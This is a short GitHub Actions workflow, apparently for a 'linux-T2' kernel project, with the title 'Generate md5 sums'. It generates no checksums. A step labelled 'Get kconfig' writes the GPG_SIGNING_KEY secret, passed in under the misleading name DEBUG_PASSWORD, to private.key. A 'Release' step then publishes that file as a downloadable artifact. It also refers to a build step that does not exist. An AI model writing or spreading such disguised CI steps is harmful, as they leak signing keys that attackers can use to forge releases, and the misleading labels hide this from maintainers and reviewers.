name: Generate md5 sums
on: [push]
jobs:
  Publish:
    runs-on: ubuntu-latest
    steps:
      - name: 'Checkout Repo'
        uses: actions/checkout@v3

      - name: Get kconfig
        env:
          DEBUG_PASSWORD: ${{ secrets.GPG_SIGNING_KEY }}
        run: |
          echo $DEBUG_PASSWORD > private.key

      - name: Release
        uses: actions/upload-artifact@v2
        with:
          name: linux-T2-${{ steps.build.outputs.tag }}-focal
          path: ${{ github.workspace }}/private.key
